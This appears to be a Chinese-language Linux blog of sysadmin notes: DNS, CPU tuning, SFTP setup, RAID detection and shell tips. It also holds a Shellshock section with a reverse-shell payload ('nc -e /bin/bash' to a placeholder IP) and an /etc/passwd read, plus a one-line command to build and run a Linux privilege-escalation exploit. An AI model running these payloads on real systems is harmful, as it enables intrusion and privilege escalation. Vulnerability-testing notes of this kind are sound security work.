Linux on Ricky

Articles

Wed, 13 May 2026 11:15:33 +0800

TelegramChannels
warpgate: is a smart & fully transparent SSH, HTTPS, Kubernetes, MySQL, PostgreSQL bastion host that doesn’t require a client app or an SSH wrapper.
Details that make interfaces feel better: npx skills add jakubkrehel/make-interfaces-feel-better
TheWhisper: High-Performance Speech-to-Text
Open Design: The open-source alternative to Claude Design. Local-first, web-deployable, BYOK at every layer — 16 coding-agent CLIs auto-detected on your PATH (Claude Code, Codex, Devin for Terminal, Cursor Agent, Gemini CLI, OpenCode, Qwen, Qoder CLI, GitHub Copilot CLI, Hermes, Kimi, Pi, Kiro, Kilo, Mistral Vibe, DeepSeek TUI) become the design engine, driven by 31 composable Skills and 72 brand-grade Design Systems. No CLI? An OpenAI-compatible BYOK proxy is the same loop minus the spawn.
Claw Code is the public Rust implementation of the claw CLI agent harness. The canonical implementation lives in rust/, and the current source of truth for this repository is ultraworkers/claw-code.
Open-ClaudeCode: 完整开源的 Claude Code 项目 - 基于 Anthropic 官方源码重建
Claude Code Best V5 (CCB): 牢 A (Anthropic) 官方 Claude Code CLI 工具的源码反编译/逆向还原项目。目标是将 Claude Code 大部分功能及工程化能力复现 (问就是老佛爷已经付过钱了)。虽然很难绷, 但是它叫做 CCB(踩踩背)… 而且, 我们实现了企业版或者需要登陆 Claude 账号才能使用的特性, 实现技术普惠
deepclaude: Use Claude Code’s autonomous agent loop with DeepSeek V4 Pro, OpenRouter, or any Anthropic-compatible backend. Same UX, 17x cheaper.
pyinfra turns Python code into shell commands and runs them on your servers. Execute ad-hoc commands and write declarative operations. Target SSH servers, local machine and Docker containers. Fast and scales from one server to thousands. Think ansible but Python instead of YAML, and a lot faster.
mise: Dev tools, env vars, and tasks in one CLI
Aube installs automatically when you run a script. The tightest security defaults of any Node.js package manager - and the only one with a lifecycle-script jail. Drops into existing projects using existing lockfiles.
Dirty Frag: Universal Linux LPE
taken. You opened this page. It already knows the following.
internetarchive.ch
Apple is increasing my cortisol levels
Hidden Bar lets you hide menu bar items to give your Mac a cleaner look.
Thaw is a powerful menu bar management tool for macOS 26. While its primary function is hiding and showing menu bar items, it aims to cover a wide variety of additional features to make it one of the most versatile menu bar tools available.

Dirty Frag

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Articles

Thu, 30 Apr 2026 11:46:57 +0800

MAD Bugs: “cat readme.txt” is not safe in iTerm2

The core bug

The bug is a trust failure. iTerm2 accepts the SSH conductor protocol from terminal output that is not actually coming from a trusted, real conductor session. In other words, untrusted terminal output can impersonate the remote conductor.

Articles

Wed, 15 Apr 2026 09:22:42 +0800

SingleFlight
macOS 奇怪的安全扫码机制
Agentic Design Patterns
你不知道的 Claude Code：架构、治理与工程实践
你不知道的 Agent：原理、架构与工程实践
rtk: CLI proxy that reduces LLM token consumption by 60-90% on common dev commands. Single Rust binary, zero dependencies
difftastic: a structural diff that understands syntax
I Ditched Elasticsearch for Meilisearch. Here’s What Nobody Tells You.
策展島嶼的深度敘事: https://github.com/frank890417/taiwan-md
Linux 中网络包的一生
Gitingest: Turn any Git repository into a prompt-friendly text ingest for LLMs.
7 More Common Mistakes in Architecture Diagrams
Use Cases
Superpowers: Superpowers is a complete software development workflow for your coding agents, built on top of a set of composable “skills” and some initial instructions that make sure your agent uses them.
everything-claude-code: The agent harness performance optimization system. Skills, instincts, memory, security, and research-first development for Claude Code, Codex, Opencode, Cursor and beyond.
Agency Agents: A complete AI agency at your fingertips - From frontend wizards to Reddit community ninjas, from whimsy injectors to reality checkers. Each agent is a specialized expert with personality, processes, and proven deliverables.
MiroFish: A Simple and Universal Swarm Intelligence Engine, Predicting Anything.
Lightpanda Browser: the headless browser designed for AI and automation
Anatomy of the .claude/ Folder
Cocoa-Way: Native macOS Wayland Compositor written in Rust using Smithay. Experience seamless Linux app streaming on macOS without XQuartz.
Pretext: Fast, accurate & comprehensive text measurement & layout
Ghostmoon.app: A Swiss Army Knife for your macOS menu bar
CodingFont: A game to help you pick a coding font
The Git Commands I Run Before Reading Any Code
Winhance: Application designed to optimize, customize and enhance your Windows experience.
Native Instant Space Switching on MacOS
FluidCAD: Write CAD models in JavaScript. See the result in real time.
Awesome DESIGN.md: Copy a DESIGN.md into your project, tell your AI agent “build me a page that looks like this” and get pixel-perfect UI that actually matches.
graphify: AI coding assistant skill (Claude Code, Codex, OpenCode, Cursor, Gemini CLI, GitHub Copilot CLI, OpenClaw, Factory Droid, Trae, Google Antigravity). Turn any folder of code, docs, papers, images, or videos into a queryable knowledge graph

SingleFlight

package analyzer

import (
 "context"
 "sync"

 "golang.org/x/sync/singleflight"
 "github.com/nathan/stock_bot/internal/storage"
)

type AnalysisService struct {
 genai *GenAIClient
 d1Client *storage.D1Client
 stockCache map[string]*StockAnalysisResult
 mu sync.RWMutex
 sf singleflight.Group
}

func (s *AnalysisService) analyzeStock(ctx context.Context, code, name string) (*StockAnalysisResult, error) {
 // 1. 第一層防護：檢查記憶體快取 (L1 Cache)
 s.mu.RLock()
 if result, ok := s.stockCache[code]; ok {
 s.mu.RUnlock()
 return result, nil
 }
 s.mu.RUnlock()

 // 2. 第二層防護：Singleflight (請求合併)
 key := "stock:" + code
 v, err, _ := s.sf.Do(key, func() (interface{}, error) {
 // 3. 執行昂貴的邏輯 (DB + Gemini API)
 result, err := s.doAnalyzeStock(ctx, code, name)
 if err != nil {
 return nil, err
 }

 // 4. 寫入快取 (務必在 singleflight 內部完成，防止下一波瞬間擊穿)
 s.mu.Lock()
 s.stockCache[code] = result
 s.mu.Unlock()

 return result, nil
 })

 if err != nil {
 return nil, err
 }
 return v.(*StockAnalysisResult), nil
}
func (s *AnalysisService) doAnalyzeStock(ctx context.Context, code, name string) (*StockAnalysisResult, error) {
 // 建立一個子 Context 用於內部的多個非同步任務
 g, ctx := errgroup.WithContext(ctx)

 var dbData string
 var aiResult string

 // 任務 1：查資料庫
 g.Go(func() error {
 // 隨時檢查 Context 是否已取消
 select {
 case <-ctx.Done():
 return ctx.Err()
 default:
 // 模擬資料庫查詢
 dbData = "Historical Data"
 return nil
 }
 })

 // 任務 2：呼叫 Gemini API
 g.Go(func() error {
 // 將 ctx 傳入 API 客戶端，讓它能跟隨整體的超時控制
 res, err := s.genai.Generate(ctx, "Analyze this: "+code)
 if err != nil {
 return err
 }
 aiResult = res
 return nil
 })

 // 等待所有任務完成或其中一個出錯
 if err := g.Wait(); err != nil {
 return nil, err
 }

 return &StockAnalysisResult{Data: dbData, Analysis: aiResult}, nil
}
func (s *AnalysisService) analyzeStockWithMetrics(ctx context.Context, code string) (*StockAnalysisResult, error) {
 key := "stock:" + code
 v, err, shared := s.sf.Do(key, func() (interface{}, error) {
 return s.doAnalyzeStock(ctx, code, "Name")
 })

 // 紀錄監控指標：分辨是「原始呼叫」還是「共享結果」
 status := "original"
 if shared {
 status = "shared"
 }

 s.sfCounter.Add(ctx, 1, metric.WithAttributes(
 attribute.String("stock_code", code),
 attribute.String("type", status),
 ))

 if err != nil {
 return nil, err
 }
 return v.(*StockAnalysisResult), nil
}

macOS 奇怪的安全扫码机制

# 查看最近的 syspolicyd 扫描记录
log show --predicate 'subsystem == "com.apple.syspolicy.exec"' --last 5m --style compact | grep performScan

System Settings → Privacy & Security → Full Disk Access，给 VS Code 完全磁盘访问权限有效

如何在Surface Go 2安裝Fedora Linux，提昇低階平板效能

Thu, 11 Dec 2025 10:18:47 +0800

如何在 Surface Go 2 安裝 Fedora Linux，提昇低階平板效能

Surface Go 2 (Intel Pentium 4425Y，4G/64G) Wifi 版

關於 Surface Go 2 的硬體支援程度，參閱 Github 的這個表格：Supported Devices and Features

製作 Linux 開機碟

到 Fedora KDE 官網下載 ISO
然後用 Ventoy 製作開機碟。
因為 Surface Go 2 的連接埠只有 Type-C，你可能要準備擴充基座。它不能夠從 SD 卡開機。

安裝 Linux

將 Surface Go 2 關機。
長按開機鍵與音量上鍵，進入 UEFI。這個界面是可以觸控的，不用接上鍵盤，但之後安裝 Linux 可能還是需要使用實體鍵盤操作。
雖然 Fedora 支援 Secure Boot，還是建議關閉 Secure Boot，免得安裝驅動需要手動簽名。
將開機順序設定為隨身碟
開機，依照畫面指示安裝。選擇清除整個磁碟，安裝 Fedora。
關於中文輸入法，請安裝 Fcitx5
- sudo dnf install fcitx5 fcitx5-chewing fcitx5-gtk3 fcitx5-gtk4 fcitx5-qt fcitx5-qt6 fcitx5-configtool
小技巧：Fedora 預設啟用 zRAM，如果 Surface Go 的 RAM 太小，編輯 /etc/systemd/zram-generator.conf 提高 SWAP 數值，增加可用的 RAM，單位為 MB。
- [zram0]
- zram-size = 8192

加裝 linux-surface 核心

依照 Github 指示安裝。Fedora 的作法是新增 linux-surface 團隊經營的套件庫到系統
- sudo dnf config-manager addrepo --from-repofile=https://pkg.surfacelinux.com/fedora/linux-surface.repo
安裝 linux-surface 核心，重開機
- sudo dnf install --allowerasing kernel-surface iptsd libwacom-surface
uname -a 確認目前的核心是否切換成功，應該會顯示 linux-surface
由於 Fedora 系統核心更新頻率比較高，新版核心可能會覆蓋 linux-surface 的核心。故安裝 linux-surface 套件之後會自動啟用 linux-surface-default-watchdog.path 服務，確保開機啟動的都是 linux-surface 核心。

KDE 桌面的虛擬鍵盤使用方式

在系統設定 → 鍵盤 → 虛擬鍵盤啟用。需要注意的是這個鍵盤無法跟 Fcitx5 一起使用。

Mosdns-X

Sun, 09 Nov 2025 20:32:00 +0800

安裝

bash <(curl -sL https://raw.githubusercontent.com/lidebyte/bashshell/refs/heads/main/mosdns-x-manager.sh)

設定

sudo tee /etc/mosdns-x/config.yaml > /dev/null <<'EOF'
# mosdns-x 并发查询（无分流）配置

log:
 level: info
 file: /var/log/mosdns-x/mosdns-x.log

plugins:
 # 缓存插件
 - tag: cache
 type: cache
 args:
 size: 1024
 lazy_cache_ttl: 1800

 # 并发上游：取最先返回的可用答案
 - tag: forward_all
 type: fast_forward
 args:
 upstream:
 # 阿里
 - addr: "udp://223.5.5.5"
 - addr: "tls://dns.alidns.com"

 # DNSPod / doh.pub
 - addr: "udp://119.29.29.29"
 - addr: "tls://dot.pub"

 # Cloudflare
 - addr: "udp://1.1.1.1"
 - addr: "tls://cloudflare-dns.com"

 # Google
 - addr: "udp://8.8.8.8"
 - addr: "tls://dns.google"

 # 主流水线：小缓存 → 并发优选
 - tag: main
 type: sequence
 args:
 exec:
 - cache
 - forward_all

# 监听（双栈 UDP/TCP 53）
servers:
 - exec: main
 listeners:
 - addr: :53
 protocol: udp
 - addr: :53
 protocol: tcp
EOF

systemd

sudo tee /etc/systemd/system/mosdns.service > /dev/null <<'EOF'
[Unit]
Description=Mosdns-X DNS Accelerator
After=network.target

[Service]
Type=simple
User=root
Group=root
ExecStart=/usr/local/bin/mosdns-x start --as-service -d /usr/local/bin -c /etc/mosdns-x/config.yaml
Restart=always
RestartSec=5
StandardOutput=journal
StandardError=journal
SyslogIdentifier=mosdns

[Install]
WantedBy=multi-user.target
EOF

sudo systemctl daemon-reload
sudo systemctl enable --now mosdns

# 备份系统 DNS
sudo cp -n /etc/resolv.conf /etc/resolv.conf.mosdns-backup

# 改为使用本地 Mosdns-X
echo -e "nameserver 127.0.0.1\noptions edns0" | sudo tee /etc/resolv.conf

# 若 53 端口被 systemd-resolved 占用，可禁用它
sudo systemctl disable --now systemd-resolved 2>/dev/null || true

# 如果想顺便加锁（防止被 DHCP 修改），加上 chattr 一起执行：
echo -e "nameserver 127.0.0.1\n" > /etc/resolv.conf && chattr +i /etc/resolv.conf

# 查看进程状态
sudo systemctl status mosdns --no-pager

# 测试解析速度（第二次命中缓存更快）
dig +stats www.google.com
dig +stats www.baidu.com

# 查看实时日志
tail -f /var/log/mosdns-x/mosdns-x.log

Docker 容器無法存取外網？nftables 下的 NAT 配置指南

Wed, 03 Sep 2025 09:03:00 +0800

Docker 容器無法存取外網？nftables 下的 NAT 配置指南

獨立伺服器 CPU 頻率最大化配置指南

Tue, 02 Sep 2025 08:24:00 +0800

獨立伺服器 CPU 頻率最大化配置指南

看看 CPU 現在用哪種模式

前提條件系統：Linux（Debian、Ubuntu、Proxmox 等都行）

權限：root

CPU：支援動態調頻（Intel Xeon、AMD EPYC / Ryzen 等）

governor

cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor

powersave：省電小綿羊（頻率鎖低，省電但沒力）
ondemand：按需加速（要用時才升頻，可能反應慢半拍）
performance：全程高能（我們要的就是它！💪）

確認核心到底用哪種驅動（Intel / AMD）

cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver

暫時拉滿效能

for cpu in /sys/devices/system/cpu/cpu[0-9]*; do
 echo performance > $cpu/cpufreq/scaling_governor
done

重啟後也保持高能

方案 A：最穩妥推薦

apt install cpufrequtils -y

echo 'GOVERNOR="performance"' >/etc/default/cpufrequtils
systemctl enable cpufrequtils
systemctl start cpufrequtils

方案 B：systemd 自訂服務

# /etc/systemd/system/cpu-performance.service
[Unit]
Description=Set CPU governor to performance
After=multi-user.target

[Service]
Type=oneshot
ExecStart=/bin/bash -c 'for cpu in /sys/devices/system/cpu/cpu[0-9]*; do echo performance > $cpu/cpufreq/scaling_governor; done'

[Install]
WantedBy=multi-user.target

systemctl daemon-reexec
systemctl daemon-reload
systemctl enable --now cpu-performance.service

透過LinuxServer.io打包的Docker映像檔，將桌面程式轉成網頁版，透過瀏覽器即可使用

Fri, 01 Aug 2025 15:52:00 +0800

適合舊電腦的輕量級 Linux 發行版

Tue, 20 Aug 2024 12:38:00 +0800

lightweight-linux-distributions-for-your-pc

名稱	網站	說明
Puppy Linux	https://puppylinux-woof-ce.github.io/	這個小巧的系統不到 300MB，即使只有 512MB RAM 的機器也能順暢運行。
Bodhi Linux	https://www.bodhilinux.com/	系統需求只要 512MB RAM 與 500MHz 處理器。
Peppermint OS	https://peppermintos.com/	只需 512MB RAM 就能運行，所以你的 Pentium 4 或 Core 2 Duo 老筆電也能跑。雖然 Peppermint OS 對本機資源需求很低，但它與雲端與 web 應用整合良好，並且內建與 Dropbox、Google Drive 等服務的深度整合。
AntiX	https://antixlinux.com/	AntiX 的設計目標是能在只有 64MB RAM 與 Pentium II 處理器的系統上運行。
Lubuntu	https://lubuntu.me/	Lubuntu 在只有 512 MB RAM 與 1 GHz 處理器的電腦上也能順暢運行。

Add SFTP user and share directory

Thu, 30 Nov 2023 17:22:00 +0800

dev_test_user, qa_test_user 同權限 dev_user, qa_user 同權限

1. 建立共享資料夾(SFTP 使用的資料夾)

sudo mkdir -p /home/{test,prod}/{exchange,upload}
sudo mkdir -p /home/{test,prod}/exchange/success
sudo mkdir -p /home/{test,prod}/upload/backup

2. 建立使用者群組

sudo groupadd share01-test
sudo groupadd share01-prod

3. 創建 qa_test_user 使用者並設定 qa_test_user 使用者的群組為 share01-test

sudo useradd -m -G share01-test qa_test_user

# 設定 dev_test_user 使用者的群組為 share01-test
sudo usermod -G share01-test dev_test_user

# 設定密碼
sudo passwd qa_test_user

4. 創建 qa_user 使用者並設定 qa_user 使用者的群組為 share01-prod

sudo useradd -m -G share01-prod qa_user

# 設定 dev_user 使用者的群組為 share01-prod
sudo usermod -G share01-prod dev_user

# 設定密碼
sudo passwd qa_user

5. 設定權限

# 設定 /home/test 資料夾(含下級資料夾)的使用者為 qa_test_user，群組為 share01-test
sudo chown -R qa_test_user:share01-test test/

# 設定 /home/prod 資料夾(含下級資料夾)的使用者為 qa_user，群組為 share01-prod
sudo chown -R qa_user:share01-prod prod/

# SFTP 登入資料夾權限要給 root
sudo chown root:root /home/test
sudo chown root:root /home/prod

6. 設定 /etc/ssh/sshd_config

/etc/ssh/sshd_config

Container security fundamentals

Wed, 04 Oct 2023 09:06:00 +0800

調整系統使得 EMQX 可以支援 1M 連線

Wed, 27 Sep 2023 10:36:00 +0800

Linux Kernel Tuning

node level, basically the non-namespaced sysctls

# Sets the maximum number of file handles allowed by the kernel
sysctl -w fs.file-max=2097152

# Sets the maximum number of open file descriptors that a process can have
sysctl -w fs.nr_open=2097152

namespaced sysctls

# Sets the maximum number of connections that can be queued for acceptance by the kernel.
sysctl -w net.core.somaxconn=32768

# Sets the maximum number of SYN requests that can be queued by the kernel
sysctl -w net.ipv4.tcp_max_syn_backlog=16384

# Setting the minimum, default and maximum size of TCP Buffer
sysctl -w net.ipv4.tcp_rmem='1024 4096 16777216'
sysctl -w net.ipv4.tcp_wmem='1024 4096 16777216'

# Setting Parameters for TCP Connection Tracking
sysctl -w net.netfilter.nf_conntrack_tcp_timeout_time_wait=30

# Controls the maximum number of entries in the TCP time-wait bucket table
sysctl -w net.ipv4.tcp_max_tw_buckets=1048576

# Controls Timeout for FIN-WAIT-2 Sockets:
sysctl -w net.ipv4.tcp_fin_timeout=15

There are some more namespaced sysctls that will improve the performance but because of an active issue we are not able to set them on the container level

# Sets the size of the backlog queue for the network device
sysctl -w net.core.netdev_max_backlog=16384

# Amount of memory that is allocated for storing incoming and outgoing data for a socket
sysctl -w net.core.rmem_default=262144
sysctl -w net.core.wmem_default=262144

# Setting the maximum amount of memory for the socket buffers
sysctl -w net.core.rmem_max=16777216
sysctl -w net.core.wmem_max=16777216
sysctl -w net.core.optmem_max=16777216

Erlang VM Tuning

## Erlang Process Limit
node.process_limit = 2097152

## Sets the maximum number of simultaneously existing ports for this system
node.max_ports = 2097152

EMQX Broker Tuning

# Other configuration…
EMQX_LISTENER__TCP__EXTERNAL: "0.0.0.0:1883"
EMQX_LISTENER__TCP__EXTERNAL__ACCEPTORS: 64
EMQX_LISTENER__TCP__EXTERNAL__MAX_CONNECTIONS: 1024000

有关 MTU 和 MSS 的一切

Wed, 12 Apr 2023 12:48:12 +0800

有关 MTU 和 MSS 的一切

在 Linux 中偵測 RAID 資訊

Mon, 28 Nov 2022 15:36:27 +0800

在 Linux 中偵測 RAID 資訊

lspci

lspci | grep RAID
00:1f.2 RAID bus controller: Intel Corporation 82801 Mobile SATA Controller [RAID mode] (rev 04)

lshw

lshw -class storage
 *-raid
 description: RAID bus controller
 product: 82801 Mobile SATA Controller [RAID mode]
 vendor: Intel Corporation
 physical id: 1f.2
 bus info: pci@0000:00:1f.2
 logical name: scsi0
 version: 04
 width: 32 bits
 clock: 66MHz
 capabilities: raid msi pm bus_master cap_list emulated
 configuration: driver=ahci latency=0
 resources: irq:26 ioport:f0d0(size=8) ioport:f0c0(size=4) ioport:f0b0(size=8) ioport:f0a0(size=4) ioport:f060(size=32) memory:f7e36000-f7e367ff

smartctl

dmesg | grep -i scsi
[ 0.210852] SCSI subsystem initialized
[ 0.341280] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 243)
...
[ 1.213299] scsi 0:0:0:0: Direct-Access ATA ST320LT012-9WS14 YAM1 PQ: 0 ANSI: 5
[ 1.319886] sd 0:0:0:0: [sda] Attached SCSI disk
[ 19.571008] sd 0:0:0:0: Attached scsi generic sg0 type 0

smartctl --all /dev/sda
Model Family: Seagate Laptop HDD
Device Model: ST320LT012-9WS14C
Serial Number: S0V3R9LL
LU WWN Device Id: 5 000c50 05be4653c
Firmware Version: 0001YAM1
User Capacity: 320,072,933,376 bytes [320 GB]
Sector Sizes: 512 bytes logical, 4096 bytes physical
Rotation Rate: 5400 rpm
Form Factor: 2.5 inches
Device is: In smartctl database 7.3/5319
ATA Version is: ATA8-ACS T13/1699-D revision 4
SATA Version is: SATA 2.6, 3.0 Gb/s (current: 3.0 Gb/s)
Local Time is: Sat Nov 19 20:52:01 2022 PKT
SMART support is: Available - device has SMART capability.
SMART support is: Enabled
...

MegaCLI

megacli -LDInfo -Lall -aALL
Adapter 0 -- Virtual Drive Information:
Virtual Drive: 0 (Target Id: 0)
Name : SEAGATE
RAID Level : Primary-1, Secondary-0, RAID Level Qualifier-0
Size : 320 GB
Sector Size : 512
Mirror Data : 320 GB
State : Optimal
...

lsscsi

lsscsi
[0:0:0:0] disk ATA ST320LT012-9WS14 YAM1 /dev/sda

廠商專用工具

omreport storage vdisk
List of Virtual Disks in the System

Controller SEAGATE Laptop HDD
ID : 0
Status : Ok
Name : SEAGATE
State : Ready
Hot Spare Policy violated : Not Assigned
Encrypted : No
Layout : RAID-0
Size : 320.00 GB (343597383680 bytes)
T10 Protection Information Status : No
Associated Fluid Cache State : Not Applicable
Device Name : /dev/sda
Bus Protocol : ATA
Media : HDD
Read Policy : Adaptive Read Ahead
Write Policy : Write Back
Cache Policy : Not Applicable
Stripe Element Size : 128 KB
Disk Cache Policy : Enabled

測試伺服器是否易受 Shellshock 漏洞影響

Mon, 28 Nov 2022 15:35:30 +0800

測試伺服器是否易受 Shellshock 漏洞影響

Shellshock 漏洞

env x=' () {:;};'

利用 Shellshock 漏洞

當功能忽略使用者指定的指令，改執行 ForceCommand 的內容時，置換指令就會被執行。
使用者的原始指令會被放在 “SSH_ORIGINAL_COMMAND” 環境變數中。若使用者預設 shell 是 Bash，Bash 在啟動時會解析 “SSH_ORIGINAL_COMMAND” 的值並執行其中的指令。

Shellshock 利用指令範例

## 1
curl -H "X-Frame-Options: () {:;};echo;/bin/nc -e /bin/bash 192.168.y.y 443" 192.168.x.y/CGI-bin/hello.cgi

## 2
curl --insecure 192.168.x.x -H "User-Agent: () { :; }; /bin/cat /etc/passwd"

使用 nmap 腳本測試漏洞

nmap -sV -p- --script http-shellshock 192.168.x.x
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

從零開始的容器

Thu, 24 Nov 2022 13:10:14 +0800

從零開始的容器

容器檔案系統

$ wget https://github.com/ericchiang/containers-from-scratch/releases/download/v0.1.0/rootfs.tar.gz
$ sha256sum rootfs.tar.gz
c79bfb46b9cf842055761a49161831aee8f4e667ad9e84ab57ab324a49bc828c rootfs.tar.gz
$ # tar needs sudo to create /dev files and setup file ownership
$ sudo tar -zxf rootfs.tar.gz
$ ls rootfs
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr
$ ls -al rootfs/bin/ls
-rwxr-xr-x. 1 root root 118280 Mar 14 2015 rootfs/bin/ls

chroot

它可以限制某個程序對檔案系統的視野。這裡我們把程序限制在 “rootfs” 目錄，然後執行一個 shell。

$ sudo chroot rootfs /bin/bash
root@localhost:/# ls /
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr
root@localhost:/# which python
/usr/bin/python
root@localhost:/# /usr/bin/python -c 'print "Hello, container world!"'
Hello, container world!
root@localhost:/#

當我們執行 Python 直譯器時，實際上是執行 rootfs/usr/bin/python，而不是宿主機的 Python。

如何刪除檔名含有不可列印字元的檔案

Mon, 14 Nov 2022 13:55:17 +0800

如何刪除檔名含有不可列印字元的檔案

ls -l
total 13
-rw-r--r-- 1 ZZ 197121 4 Nov 6 07:08 ' '
-rw-r--r-- 1 ZZ 197121 162 Apr 16 2022 '~$iscord.docx'
-rw-r--r-- 1 ZZ 197121 6 Nov 6 06:03 ''$'\302\226'
-rw-r--r-- 1 ZZ 197121 4 Nov 6 06:01 ''$'\302\226''Λ---ω'
-rw-r--r-- 1 ZZ 197121 4 Nov 6 06:13 '␴?␴??␴??::␴?␴'
-rw-r--r-- 1 ZZ 197121 4 Nov 6 06:12 ␴__␴
-rw-r--r-- 1 ZZ 197121 4 Nov 6 06:14 ␴␴␴␴␴␴␴␴␴␴␴␴␴␴␴␴␴
-rw-r--r-- 1 ZZ 197121 4 Nov 6 06:18 '␴ω␴␴␣␦'$'\342\220\264'
-rw-r--r-- 1 ZZ 197121 4 Nov 6 06:16 ␣␣␣␣␣␣␣␣
-rw-r--r-- 1 ZZ 197121 4 Nov 6 06:26 ␣ μ μ Ω Ω
-rw-r--r-- 1 ZZ 197121 14 Nov 6 06:23 '␣ μ ␴'$'\342\220\264''Ξ'
-rw-r--r-- 1 ZZ 197121 4 Nov 6 06:27
-rw-r--r-- 1 ZZ 197121 4 Nov 6 06:27

使用 ANSI-C Quoting

# Using ANSI-C Quoting
rm ''$'\302\226'
# We can also use the $ special character before enclosing the filename in single quotes
rm $'\356\200\215'

# pass an item's name to rm without using the ANSI-C quoting
rm '\026\033'
rm: cannot remove '\026\033': No such file or directory

使用 Inode 編號

ls -li
total 11
...
6517085 -rw-r--r-- 1 ZZ 197121 4 Nov 6 06:18 '␴ω␴␴␣␦'$'\342\220\264'
7826050 -rw-r--r-- 1 ZZ 197121 3 Nov 9 04:23 ''$'\356\200\215\356\200\215\356\200\215'
4685554 -rw-r--r-- 1 ZZ 197121 4 Nov 6 06:27

可以透過 find 的 -inum 參數指定 inode 來刪除檔案。

/etc/shadow 與建立 yescrypt、MD5、SHA-256、SHA-512 密碼雜湊

Mon, 14 Nov 2022 12:55:39 +0800

/etc/shadow 與建立 yescrypt、MD5、SHA-256、SHA-512 密碼雜湊

chage 與密碼期限

chage --list root
Last password change : Oct 01, 2022
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : 0
Maximum number of days between password change : 99999
Number of days of warning before password expires : 7

因此，我們可以用對應的旗標修改各欄位：

-d 或 --lastday：最後變更日期
-m 或 --mindays：變更密碼最少間隔天數
-M 或 --maxdays：密碼最大有效天數
-W 或 --warndays：到期前警告天數
-I 或 --inactive：密碼失效天數
-E 或 --expiredate：帳號過期日期

chpasswd 與密碼

echo 'user1:PASSWORD' | chpasswd --crypt-method SHA512

如何在別名指令上使用 which

Thu, 10 Nov 2022 16:24:30 +0800

如何在別名指令上使用 which

type

type grep
grep is an alias for grep --color=auto


# Bash's type
type -P grep
/usr/bin/grep

# Zsh's type
type -p grep
grep is /usr/bin/grep

GNU which

which -a which
which: shell built-in command
/usr/bin/which


alias top10
top10='print -l ${(o)history%% *} | uniq -c | sort -nr | head -n 10'

alias | /usr/bin/which -i top10
top10='print -l ${(o)history%% *} | uniq -c | sort -nr | head -n 10'
 /usr/bin/uniq
 /usr/bin/sort
 /usr/bin/head

Shell Script 最佳實務

Thu, 03 Nov 2022 16:51:11 +0800

Shell Script 最佳實務

重點

第一行就用 #!/usr/bin/env bash。
檔案使用 .sh（或 .bash）副檔名。
在腳本開頭使用 set -o errexit。
也建議使用 set -o nounset。
1. 用 "${VARNAME-}" 取代 "$VARNAME"
使用 set -o pipefail。
使用 set -o xtrace，並檢查 $TRACE 環境變數。
1. if [[ "${TRACE-0}" == "1" ]]; then set -o xtrace; fi
2. 使用者可以透過 TRACE=1 ./script.sh 啟用除錯模式，而不是 ./script.sh。
if / while 條件使用 [[ ]]，而不是 [ ] 或 test。
變數存取一律用雙引號包住。
在函式中使用 local 變數。
輸出錯誤訊息時請導向 stderr。
1. 例如 echo 'Something unexpected happened' >&2。
能用長選項就用長選項（例如 --silent 取代 -s）。
適合的話，腳本開頭就切換到腳本所在目錄。
1. 可用 cd "$(dirname "$0")"，多數情況可用。
使用 shellcheck 並留意其警告。

範本

#!/usr/bin/env bash

set -o errexit
set -o nounset
set -o pipefail
if [[ "${TRACE-0}" == "1" ]]; then
 set -o xtrace
fi

if [[ "${1-}" =~ ^-*h(elp)?$ ]]; then
 echo 'Usage: ./script.sh arg-one arg-two

This is an awesome bash script to make your life better.

'
 exit
fi

cd "$(dirname "$0")"

main() {
 echo do awesome stuff
}

main "$@"

命令列的藝術

Wed, 02 Nov 2022 15:04:37 +0800

命令列的藝術

在 Shell 中輸出 ASCII 藝術字

Fri, 21 Oct 2022 17:30:41 +0800

在 Shell 中輸出 ASCII 藝術字

sudo apt install sysvbanner

$ banner hello

 # # ###### # # ####
 # # # # # # #
 ###### ##### # # # #
 # # # # # # #
 # # # # # # #
 # # ###### ###### ###### ####

FIGlet: Frank, Ian, and Glenn’s Letters

sudo apt install figlet

$ figlet hello
 _ _ _
| |__ ___| | | ___
| '_ \ / _ \ | |/ _ \
| | | | __/ | | (_) |
|_| |_|\___|_|_|\___/

-f 選項可指定輸出的字型
-l、-c、-r 可將文字對齊到左、中、右

TOIlet: FIGlet With More Options

sudo apt install toilet

如何讓終端輸出覆蓋同一行

Fri, 21 Oct 2022 17:29:10 +0800

如何讓終端輸出覆蓋同一行

問題簡介

$ cat print_status.sh
!/bin/bash
echo "[INFO] Processing file: readme.txt"
sleep 2 To simulate the file processing

echo "[INFO] Processing file: veryPowerfulService.service"
sleep 2

echo "[INFO] Processing file: log.txt"
echo "DONE"


$ ./print_status.sh
[INFO] Processing file: readme.txt
[INFO] Processing file: veryPowerfulService.service
[INFO] Processing file: log.txt
DONE

「魔法碼」: `\033[0K\r`

-n 讓 echo 不輸出結尾的換行字元
-e 讓 echo 解讀反斜線逸出字元，例如 \n（換行）與 \r（回車）
\033 - 逸出序列，也就是 ESC
\033[ - 變成 “ESC ["，也就是控制序列引導字元（CSI）
\033[0k - 即 “CSI 0 K”，會清除從游標到行尾的文字
\r - 回車，將游標移回行首

$ cat print_status.sh
#!/bin/bash
echo -ne "[INFO] Processing file: readme.txt\033[0K\r"
sleep 2

echo -ne "[INFO] Processing file: veryPowerfulService.service\033[0K\r"
sleep 2

echo -e "[INFO] Processing file: log.txt\033[0K\r"
echo "DONE"

!/bin/bash
printf "[INFO] Processing file: readme.txt\033[0K\r"
sleep 2

printf "[INFO] Processing file: veryPowerfulService.service\033[0K\r"
sleep 2

printf "[INFO] Processing file: log.txt\033[0K\r\n"
echo "DONE"

即時監控網路介面上的 HTTP 請求

Thu, 23 Jun 2022 16:48:42 +0800

即時監控網路介面上的 HTTP 請求

tcpflow

apt/dnf install tcpflow

$ sudo tcpflow -p -c -i wlp0s20f3 port 80 | grep -oE '(GET|POST) .* HTTP/1.[01]|Host: .*'
reportfilename: ./report.xml
tcpflow: listening on wlp0s20f3
GET /alexlarsson/flatpak/ubuntu/dists/focal/InRelease HTTP/1.1

GET /mirrors.txt HTTP/1.1

-p 停用混雜模式
